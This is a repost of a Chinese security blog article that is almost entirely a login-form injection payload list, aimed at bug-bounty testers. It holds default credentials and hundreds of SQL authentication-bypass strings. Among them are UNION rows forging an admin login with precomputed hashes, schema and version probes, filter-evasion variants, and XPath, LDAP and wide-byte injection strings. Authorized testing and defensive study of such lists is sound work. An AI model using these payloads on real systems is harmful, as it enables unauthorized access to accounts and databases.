登录处SQL注入fuzz清单

admin 2024年11月7日11:32:46评论2 views字数 11004阅读36分40秒阅读模式
 

简洁线条标题

文末可直接获取文件

admin

password

1234

123456

root

toor

test

guest

' or '1'='1

' or ''='

' or 1]%00

' or /* or '

' or "a" or '

' or 1 or '

' or true() or '

'or string-length(name(.))<10 or'

'or contains(name,'adm') or'

'or contains(.,'adm') or'

'or position()=2 or'

admin' or '

admin' or '1'='2

*

*)(&

*)(|(&

pwd)

*)(|(*

*))%00

admin)(&)

pwd

admin)(!(&(|

pwd))

admin))(|(|

1234

'-'

' '

'&'

'^'

'*'

' or ''-'

' or '' '

' or ''&'

' or ''^'

' or ''*'

"-"

" "

"&"

"^"

"*"

" or ""-"

" or "" "

" or ""&"

" or ""^"

" or ""*"

or true--

" or true--

' or true--

") or true--

') or true--

' or 'x'='x

') or ('x')=('x

')) or (('x'))=(('x

" or "x"="x

") or ("x")=("x

")) or (("x"))=(("x

or 1=1

or 1=1--

or 1=1#

or 1=1/*

admin' --

admin' #

admin'/*

admin' or '1'='1

admin' or '1'='1'--

admin' or '1'='1'#

admin' or '1'='1'/*

admin'or 1=1 or ''='

admin' or 1=1

admin' or 1=1--

admin' or 1=1#

admin' or 1=1/*

admin') or ('1'='1

admin') or ('1'='1'--

admin') or ('1'='1'#

admin') or ('1'='1'/*

admin') or '1'='1

admin') or '1'='1'--

admin') or '1'='1'#

admin') or '1'='1'/*

1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055

1234 ' AND 1=0 UNION ALL SELECT 'admin', '7110eda4d09e062aa5e4a390b0a572ac0d2c0220

admin" --

admin" #

admin"/*

admin" or "1"="1

admin" or "1"="1"--

admin" or "1"="1"#

admin" or "1"="1"/*

admin"or 1=1 or ""="

admin" or 1=1

admin" or 1=1--

admin" or 1=1#

admin" or 1=1/*

admin") or ("1"="1

admin") or ("1"="1"--

admin") or ("1"="1"#

admin") or ("1"="1"/*

admin") or "1"="1

admin") or "1"="1"--

admin") or "1"="1"#

admin") or "1"="1"/*

1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055

1234 " AND 1=0 UNION ALL SELECT "admin", "7110eda4d09e062aa5e4a390b0a572ac0d2c0220

==

=

'

' --

' #

' –

'--

'/*

'#

" --

" #

"/*

' and 1='1

' and a='a

or true

' or ''='

" or ""="

1′) and '1′='1–

' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055

" AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055

' AND 1=0 UNION ALL SELECT '', '7110eda4d09e062aa5e4a390b0a572ac0d2c0220

" AND 1=0 UNION ALL SELECT "", "7110eda4d09e062aa5e4a390b0a572ac0d2c0220

and 1=1

and 1=1–

' and 'one'='one

' and 'one'='one–

' group by password having 1=1--

' group by userid having 1=1--

' group by username having 1=1--

like '%'

or 0=0 --

or 0=0 #

or 0=0 –

' or         0=0 #

' or 0=0 --

' or 0=0 #

' or 0=0 –

" or 0=0 --

" or 0=0 #

" or 0=0 –

%' or '0'='0

or 1=1–

' or 1=1--

' or '1'='1

' or '1'='1'--

' or '1'='1'/*

' or '1'='1'#

' or '1′='1

' or 1=1

' or 1=1 --

' or 1=1 –

' or 1=1;#

' or 1=1/*

' or 1=1#

' or 1=1–

') or '1'='1

') or '1'='1--

') or '1'='1'--

') or '1'='1'/*

') or '1'='1'#

') or ('1'='1

') or ('1'='1--

') or ('1'='1'--

') or ('1'='1'/*

') or ('1'='1'#

'or'1=1

'or'1=1′

" or "1"="1

" or "1"="1"--

" or "1"="1"/*

" or "1"="1"#

" or 1=1

" or 1=1 --

" or 1=1 –

" or 1=1--

" or 1=1/*

" or 1=1#

" or 1=1–

") or "1"="1

") or "1"="1"--

") or "1"="1"/*

") or "1"="1"#

") or ("1"="1

") or ("1"="1"--

") or ("1"="1"/*

") or ("1"="1"#

) or '1′='1–

) or ('1′='1–

' or 1=1 LIMIT 1;#

'or 1=1 or ''='

"or 1=1 or ""="

' or a=a--

' or a=a–

" or "a"="a

") or ("a"="a

') or ('a'='a and hi") or ("a"="a

' or 'one'='one

' or 'one'='one–

' or uid like '%

' or uname like '%

' or userid like '%

' or user like '%

' or username like '%

') or ('x'='x

' OR 'x'='x'#;

'=' 'or' and '=' 'or'

' UNION ALL SELECT 1, @@version;#

' UNION ALL SELECT system_user(),user();#

' UNION select table_schema,table_name FROM information_Schema.tables;#

admin' and substring(password/text(),1,1)='7

' and substring(password/text(),1,1)='7

"

'-- 2

"-- 2

'='

0'&lt;'2

"="

0"&lt;"2

')

")

')-- 2

')/*

')#

")-- 2

") #

")/*

')-('

')&('

')^('

')*('

')=('

0')&lt;('2

")-("

")&("

")^("

")*("

")=("

0")&lt;("2

'-''-- 2

'-''#

'-''/*

'&''-- 2

'&''#

'&''/*

'^''-- 2

'^''#

'^''/*

'*''-- 2

'*''#

'*''/*

'=''-- 2

'=''#

'=''/*

0'&lt;'2'-- 2

0'&lt;'2'#

0'&lt;'2'/*

"-""-- 2

"-""#

"-""/*

"&""-- 2

"&""#

"&""/*

"^""-- 2

"^""#

"^""/*

"*""-- 2

"*""#

"*""/*

"=""-- 2

"=""#

"=""/*

0"&lt;"2"-- 2

0"&lt;"2"#

0"&lt;"2"/*

')-''-- 2

')-''#

')-''/*

')&''-- 2

')&''#

')&''/*

')^''-- 2

')^''#

')^''/*

')*''-- 2

')*''#

')*''/*

')=''-- 2

')=''#

')=''/*

0')&lt;'2'-- 2

0')&lt;'2'#

0')&lt;'2'/*

")-""-- 2

")-""#

")-""/*

")&""-- 2

")&""#

")&""/*

")^""-- 2

")^""#

")^""/*

")*""-- 2

")*""#

")*""/*

")=""-- 2

")=""#

")=""/*

0")&lt;"2-- 2

0")&lt;"2#

0")&lt;"2/*

'oR'2

'oR'2'-- 2

'oR'2'#

'oR'2'/*

'oR'2'oR'

'oR(2)-- 2

'oR(2)#

'oR(2)/*

'oR(2)oR'

'oR 2-- 2

'oR 2#

'oR 2/*

'oR 2 oR'

'oR/**/2-- 2

'oR/**/2#

'oR/**/2/*

'oR/**/2/**/oR'

"oR"2

"oR"2"-- 2

"oR"2"#

"oR"2"/*

"oR"2"oR"

"oR(2)-- 2

"oR(2)#

"oR(2)/*

"oR(2)oR"

"oR 2-- 2

"oR 2#

"oR 2/*

"oR 2 oR"

"oR/**/2-- 2

"oR/**/2#

"oR/**/2/*

"oR/**/2/**/oR"

'oR'2'='2

'oR'2'='2'oR'

'oR'2'='2'-- 2

'oR'2'='2'#

'oR'2'='2'/*

'oR 2=2-- 2

'oR 2=2#

'oR 2=2/*

'oR 2=2 oR'

'oR/**/2=2-- 2

'oR/**/2=2#

'oR/**/2=2/*

'oR/**/2=2/**/oR'

'oR(2)=2-- 2

'oR(2)=2#

'oR(2)=2/*

'oR(2)=(2)oR'

'oR'2'='2' LimIT 1-- 2

'oR'2'='2' LimIT 1#

'oR'2'='2' LimIT 1/*

'oR(2)=(2)LimIT(1)-- 2

'oR(2)=(2)LimIT(1)#

'oR(2)=(2)LimIT(1)/*

"oR"2"="2

"oR"2"="2"oR"

"oR"2"="2"-- 2

"oR"2"="2"#

"oR"2"="2"/*

"oR 2=2-- 2

"oR 2=2#

"oR 2=2/*

"oR 2=2 oR"

"oR/**/2=2-- 2

"oR/**/2=2#

"oR/**/2=2/*

"oR/**/2=2/**/oR"

"oR(2)=2-- 2

"oR(2)=2#

"oR(2)=2/*

"oR(2)=(2)oR"

"oR"2"="2" LimIT 1-- 2

"oR"2"="2" LimIT 1#

"oR"2"="2" LimIT 1/*

"oR(2)=(2)LimIT(1)-- 2

"oR(2)=(2)LimIT(1)#

"oR(2)=(2)LimIT(1)/*

'oR true-- 2

'oR true#

'oR true/*

'oR true oR'

'oR(true)-- 2

'oR(true)#

'oR(true)/*

'oR(true)oR'

'oR/**/true-- 2

'oR/**/true#

'oR/**/true/*

'oR/**/true/**/oR'

"oR true-- 2

"oR true#

"oR true/*

"oR true oR"

"oR(true)-- 2

"oR(true)#

"oR(true)/*

"oR(true)oR"

"oR/**/true-- 2

"oR/**/true#

"oR/**/true/*

"oR/**/true/**/oR"

'oR'2'LiKE'2

'oR'2'LiKE'2'-- 2

'oR'2'LiKE'2'#

'oR'2'LiKE'2'/*

'oR'2'LiKE'2'oR'

'oR(2)LiKE(2)-- 2

'oR(2)LiKE(2)#

'oR(2)LiKE(2)/*

'oR(2)LiKE(2)oR'

"oR"2"LiKE"2

"oR"2"LiKE"2"-- 2

"oR"2"LiKE"2"#

"oR"2"LiKE"2"/*

"oR"2"LiKE"2"oR"

"oR(2)LiKE(2)-- 2

"oR(2)LiKE(2)#

"oR(2)LiKE(2)/*

"oR(2)LiKE(2)oR"

admin

admin'-- 2

admin'#

admin"-- 2

admin"#

ffifdyop

' UniON SElecT 1,2-- 2

' UniON SElecT 1,2,3-- 2

' UniON SElecT 1,2,3,4-- 2

' UniON SElecT 1,2,3,4,5-- 2

' UniON SElecT 1,2#

' UniON SElecT 1,2,3#

' UniON SElecT 1,2,3,4#

' UniON SElecT 1,2,3,4,5#

'UniON(SElecT(1),2)-- 2

'UniON(SElecT(1),2,3)-- 2

'UniON(SElecT(1),2,3,4)-- 2

'UniON(SElecT(1),2,3,4,5)-- 2

'UniON(SElecT(1),2)#

'UniON(SElecT(1),2,3)#

'UniON(SElecT(1),2,3,4)#

'UniON(SElecT(1),2,3,4,5)#

" UniON SElecT 1,2-- 2

" UniON SElecT 1,2,3-- 2

" UniON SElecT 1,2,3,4-- 2

" UniON SElecT 1,2,3,4,5-- 2

" UniON SElecT 1,2#

" UniON SElecT 1,2,3#

" UniON SElecT 1,2,3,4#

" UniON SElecT 1,2,3,4,5#

"UniON(SElecT(1),2)-- 2

"UniON(SElecT(1),2,3)-- 2

"UniON(SElecT(1),2,3,4)-- 2

"UniON(SElecT(1),2,3,4,5)-- 2

"UniON(SElecT(1),2)#

"UniON(SElecT(1),2,3)#

"UniON(SElecT(1),2,3,4)#

"UniON(SElecT(1),2,3,4,5)#

'||'2

'||2-- 2

'||'2'||'

'||2#

'||2/*

'||2||'

"||"2

"||2-- 2

"||"2"||"

"||2#

"||2/*

"||2||"

'||'2'='2

'||'2'='2'||'

'||2=2-- 2

'||2=2#

'||2=2/*

'||2=2||'

"||"2"="2

"||"2"="2"||"

"||2=2-- 2

"||2=2#

"||2=2/*

"||2=2||"

'||2=(2)LimIT(1)-- 2

'||2=(2)LimIT(1)#

'||2=(2)LimIT(1)/*

"||2=(2)LimIT(1)-- 2

"||2=(2)LimIT(1)#

"||2=(2)LimIT(1)/*

'||true-- 2

'||true#

'||true/*

'||true||'

"||true-- 2

"||true#

"||true/*

"||true||"

'||'2'LiKE'2

'||'2'LiKE'2'-- 2

'||'2'LiKE'2'#

'||'2'LiKE'2'/*

'||'2'LiKE'2'||'

'||(2)LiKE(2)-- 2

'||(2)LiKE(2)#

'||(2)LiKE(2)/*

'||(2)LiKE(2)||'

"||"2"LiKE"2

"||"2"LiKE"2"-- 2

"||"2"LiKE"2"#

"||"2"LiKE"2"/*

"||"2"LiKE"2"||"

"||(2)LiKE(2)-- 2

"||(2)LiKE(2)#

"||(2)LiKE(2)/*

"||(2)LiKE(2)||"

')oR('2

')oR'2'-- 2

')oR'2'#

')oR'2'/*

')oR'2'oR('

')oR(2)-- 2

')oR(2)#

')oR(2)/*

')oR(2)oR('

')oR 2-- 2

')oR 2#

')oR 2/*

')oR 2 oR('

')oR/**/2-- 2

')oR/**/2#

')oR/**/2/*

')oR/**/2/**/oR('

")oR("2

")oR"2"-- 2

")oR"2"#

")oR"2"/*

")oR"2"oR("

")oR(2)-- 2

")oR(2)#

")oR(2)/*

")oR(2)oR("

")oR 2-- 2

")oR 2#

")oR 2/*

")oR 2 oR("

")oR/**/2-- 2

")oR/**/2#

")oR/**/2/*

")oR/**/2/**/oR("

')oR'2'=('2

')oR'2'='2'oR('

')oR'2'='2'-- 2

')oR'2'='2'#

')oR'2'='2'/*

')oR 2=2-- 2

')oR 2=2#

')oR 2=2/*

')oR 2=2 oR('

')oR/**/2=2-- 2

')oR/**/2=2#

')oR/**/2=2/*

')oR/**/2=2/**/oR('

')oR(2)=2-- 2

')oR(2)=2#

')oR(2)=2/*

')oR(2)=(2)oR('

')oR'2'='2' LimIT 1-- 2

')oR'2'='2' LimIT 1#

')oR'2'='2' LimIT 1/*

')oR(2)=(2)LimIT(1)-- 2

')oR(2)=(2)LimIT(1)#

')oR(2)=(2)LimIT(1)/*

")oR"2"=("2

")oR"2"="2"oR("

")oR"2"="2"-- 2

")oR"2"="2"#

")oR"2"="2"/*

")oR 2=2-- 2

")oR 2=2#

")oR 2=2/*

")oR 2=2 oR("

")oR/**/2=2-- 2

")oR/**/2=2#

")oR/**/2=2/*

")oR/**/2=2/**/oR("

")oR(2)=2-- 2

")oR(2)=2#

")oR(2)=2/*

")oR(2)=(2)oR("

")oR"2"="2" LimIT 1-- 2

")oR"2"="2" LimIT 1#

")oR"2"="2" LimIT 1/*

")oR(2)=(2)LimIT(1)-- 2

")oR(2)=(2)LimIT(1)#

")oR(2)=(2)LimIT(1)/*

')oR true-- 2

')oR true#

')oR true/*

')oR true oR('

')oR(true)-- 2

')oR(true)#

')oR(true)/*

')oR(true)oR('

')oR/**/true-- 2

')oR/**/true#

')oR/**/true/*

')oR/**/true/**/oR('

")oR true-- 2

")oR true#

")oR true/*

")oR true oR("

")oR(true)-- 2

")oR(true)#

")oR(true)/*

")oR(true)oR("

")oR/**/true-- 2

")oR/**/true#

")oR/**/true/*

")oR/**/true/**/oR("

')oR'2'LiKE('2

')oR'2'LiKE'2'-- 2

')oR'2'LiKE'2'#

')oR'2'LiKE'2'/*

')oR'2'LiKE'2'oR('

')oR(2)LiKE(2)-- 2

')oR(2)LiKE(2)#

')oR(2)LiKE(2)/*

')oR(2)LiKE(2)oR('

")oR"2"LiKE("2

")oR"2"LiKE"2"-- 2

")oR"2"LiKE"2"#

")oR"2"LiKE"2"/*

")oR"2"LiKE"2"oR("

")oR(2)LiKE(2)-- 2

")oR(2)LiKE(2)#

")oR(2)LiKE(2)/*

")oR(2)LiKE(2)oR("

admin')-- 2

admin')#

admin')/*

admin")-- 2

admin")#

') UniON SElecT 1,2-- 2

') UniON SElecT 1,2,3-- 2

') UniON SElecT 1,2,3,4-- 2

') UniON SElecT 1,2,3,4,5-- 2

') UniON SElecT 1,2#

') UniON SElecT 1,2,3#

') UniON SElecT 1,2,3,4#

') UniON SElecT 1,2,3,4,5#

')UniON(SElecT(1),2)-- 2

')UniON(SElecT(1),2,3)-- 2

')UniON(SElecT(1),2,3,4)-- 2

')UniON(SElecT(1),2,3,4,5)-- 2

')UniON(SElecT(1),2)#

')UniON(SElecT(1),2,3)#

')UniON(SElecT(1),2,3,4)#

')UniON(SElecT(1),2,3,4,5)#

") UniON SElecT 1,2-- 2

") UniON SElecT 1,2,3-- 2

") UniON SElecT 1,2,3,4-- 2

") UniON SElecT 1,2,3,4,5-- 2

") UniON SElecT 1,2#

") UniON SElecT 1,2,3#

") UniON SElecT 1,2,3,4#

") UniON SElecT 1,2,3,4,5#

")UniON(SElecT(1),2)-- 2

")UniON(SElecT(1),2,3)-- 2

")UniON(SElecT(1),2,3,4)-- 2

")UniON(SElecT(1),2,3,4,5)-- 2

")UniON(SElecT(1),2)#

")UniON(SElecT(1),2,3)#

")UniON(SElecT(1),2,3,4)#

")UniON(SElecT(1),2,3,4,5)#

')||('2

')||2-- 2

')||'2'||('

')||2#

')||2/*

')||2||('

")||("2

")||2-- 2

")||"2"||("

")||2#

")||2/*

")||2||("

')||'2'=('2

')||'2'='2'||('

')||2=2-- 2

')||2=2#

')||2=2/*

')||2=2||('

")||"2"=("2

")||"2"="2"||("

")||2=2-- 2

")||2=2#

")||2=2/*

")||2=2||("

')||2=(2)LimIT(1)-- 2

')||2=(2)LimIT(1)#

')||2=(2)LimIT(1)/*

")||2=(2)LimIT(1)-- 2

")||2=(2)LimIT(1)#

")||2=(2)LimIT(1)/*

')||true-- 2

')||true#

')||true/*

')||true||('

")||true-- 2

")||true#

")||true/*

")||true||("

')||'2'LiKE('2

')||'2'LiKE'2'-- 2

')||'2'LiKE'2'#

')||'2'LiKE'2'/*

')||'2'LiKE'2'||('

')||(2)LiKE(2)-- 2

')||(2)LiKE(2)#

')||(2)LiKE(2)/*

')||(2)LiKE(2)||('

")||"2"LiKE("2

")||"2"LiKE"2"-- 2

")||"2"LiKE"2"#

")||"2"LiKE"2"/*

")||"2"LiKE"2"||("

")||(2)LiKE(2)-- 2

")||(2)LiKE(2)#

")||(2)LiKE(2)/*

")||(2)LiKE(2)||("

' UnION SELeCT 1,2`

' UnION SELeCT 1,2,3`

' UnION SELeCT 1,2,3,4`

' UnION SELeCT 1,2,3,4,5`

" UnION SELeCT 1,2`

" UnION SELeCT 1,2,3`

" UnION SELeCT 1,2,3,4`

" UnION SELeCT 1,2,3,4,5`

' or 1=1 limit 1 -- -+

'="or'

Pass1234.

Pass1234.' AND 1=0 UniON SeleCT 'admin', 'fe1ff105bf807478a217ad4e378dc658

Pass1234.' AND 1=0 UniON SeleCT 'admin', 'fe1ff105bf807478a217ad4e378dc658'#

Pass1234.' AND 1=0 UniON ALL SeleCT 'admin', md5('Pass1234.

Pass1234.' AND 1=0 UniON ALL SeleCT 'admin', md5('Pass1234.')#

Pass1234.' AND 1=0 UniON SeleCT 'admin', '5b19a9e947ca0fee49995f2a8b359e1392adbb61

Pass1234.' AND 1=0 UniON SeleCT 'admin', '5b19a9e947ca0fee49995f2a8b359e1392adbb61'#

Pass1234.' and 1=0 union select 'admin',sha('Pass1234.

Pass1234.' and 1=0 union select 'admin',sha('Pass1234.')#

Pass1234." AND 1=0 UniON SeleCT "admin", "fe1ff105bf807478a217ad4e378dc658

Pass1234." AND 1=0 UniON SeleCT "admin", "fe1ff105bf807478a217ad4e378dc658"#

Pass1234." AND 1=0 UniON ALL SeleCT "admin", md5("Pass1234.

Pass1234." AND 1=0 UniON ALL SeleCT "admin", md5("Pass1234.")#

Pass1234." AND 1=0 UniON SeleCT "admin", "5b19a9e947ca0fee49995f2a8b359e1392adbb61

Pass1234." AND 1=0 UniON SeleCT "admin", "5b19a9e947ca0fee49995f2a8b359e1392adbb61"#

Pass1234." and 1=0 union select "admin",sha("Pass1234.

Pass1234." and 1=0 union select "admin",sha("Pass1234.")#

%A8%27 Or 1=1-- 2

%8C%A8%27 Or 1=1-- 2

%bf' Or 1=1 -- 2

%A8%27 Or 1-- 2

%8C%A8%27 Or 1-- 2

%bf' Or 1-- 2

%A8%27Or(1)-- 2

%8C%A8%27Or(1)-- 2

%bf'Or(1)-- 2

%A8%27||1-- 2

%8C%A8%27||1-- 2

%bf'||1-- 2

%A8%27) Or 1=1-- 2

%8C%A8%27) Or 1=1-- 2

%bf') Or 1=1 -- 2

%A8%27) Or 1-- 2

%8C%A8%27) Or 1-- 2

%bf') Or 1-- 2

%A8%27)Or(1)-- 2

%8C%A8%27)Or(1)-- 2

%bf')Or(1)-- 2

%A8%27)||1-- 2

%8C%A8%27)||1-- 2

%bf')||1-- 2

回复 login 获取bypass字典文件

登录处SQL注入fuzz清单

 

原文始发于微信公众号(道一安全):【SRC必备|收藏|备用】登录处SQL注入fuzz清单

 

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年11月7日11:32:46
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   登录处SQL注入fuzz清单https://cn-sec.com/archives/3367148.html

发表评论

匿名网友 填写信息